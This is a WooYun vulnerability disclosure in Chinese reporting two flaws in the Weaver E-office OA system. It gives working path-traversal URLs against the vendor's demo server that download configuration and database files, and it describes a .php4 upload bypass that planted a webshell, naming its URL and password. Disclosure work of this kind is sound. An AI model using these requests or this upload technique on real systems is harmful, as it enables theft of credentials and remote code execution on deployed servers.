当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-038914

漏洞标题:泛微E-office OA管理系统存在任意文件下载及文件上传导致任意代码执行(已getshell)

相关厂商:上海泛微网络科技股份有限公司

漏洞作者: Coody

提交时间:2013-10-06 00:29

修复时间:2013-10-11 00:29

公开时间:2013-10-11 00:29

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-10-06: 细节已通知厂商并且等待厂商处理中
2013-10-11: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

继续 applychen 的脚步,因为之前我遇到过这个系统,最新官方demo中也确实存在问题。
感谢 applychen 提供的测试账号。
@cncert国家互联网应急中心 有什么问题,可以私信我。

详细说明:

继续  WooYun: 泛微E-office OA管理系统存在SQL注射漏洞可查库  的挖掘
官方demo http://eoffice8.weaver.cn:8028/login.php
测试账号还是那个 xj


存在两个问题:

0x01:任意文件下载漏洞
测试链接 http://eoffice8.weaver.cn:8028/inc/attach.php?OP=1&ATTACHMENT_NAME=index.php&ATTACHMENT_ID=5402024843
其中,参数 ATTACHMENT_NAME 未有效的控制其范围,导致任意文件下载
配置文件下载(程序zend加密,在网站http://www.showmycode.com/中可以解密)
http://eoffice8.weaver.cn:8028/inc/attach.php?OP=1&ATTACHMENT_NAME=../../inc/oa_config.php&ATTACHMENT_ID=5402024843
数据库连接文件下载
http://eoffice8.weaver.cn:8028/inc/attach.php?OP=1&ATTACHMENT_NAME=../../mysql_config.ini&ATTACHMENT_ID=5402024843


0x02:文件上传导致任意代码执行
经分析inc/utility_all.php 的源码可知附件上传的路径为:attachment/$ATTACHMENT_ID /$ATTACHMENT_NAME
建立个人日志--上传附件,查看源码得到相应的 ATTACHMENT_ID 及 ATTACHMENT_NAME 的值,
从配置文件中可以知道,附件中未禁止php4格式的文件上传,因此可以直接getshell
通过以上分析,最终得到的shell地址是:http://eoffice8.weaver.cn:8028/attachment/2506423447/conf1g.php4 密码是8(system权限)

漏洞证明:

0x01:任意文件下载漏洞
QQ图片20131005141421.jpg







oa-config解密后.jpg







.jpg





0x02:文件上传导致任意代码执行
QQ图片20131005141715.jpg







webshell.jpg







webshell.jpg







.jpg

修复方案:

确实存在通用性。

版权声明:转载请注明来源 Coody@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-10-11 00:29

厂商回复:

漏洞Rank:20 (WooYun评价)

最新状态:

2013-10-11:CNVD在官方demo上确认所述情况,根据提取的应用特征查找到一些实例,由于未能取得当前测试用户权限,对于通用性还需要进一步确认。未及时确认,向白帽子致歉,根据行业用户潜在影响,rank 20(请剑心补上吧)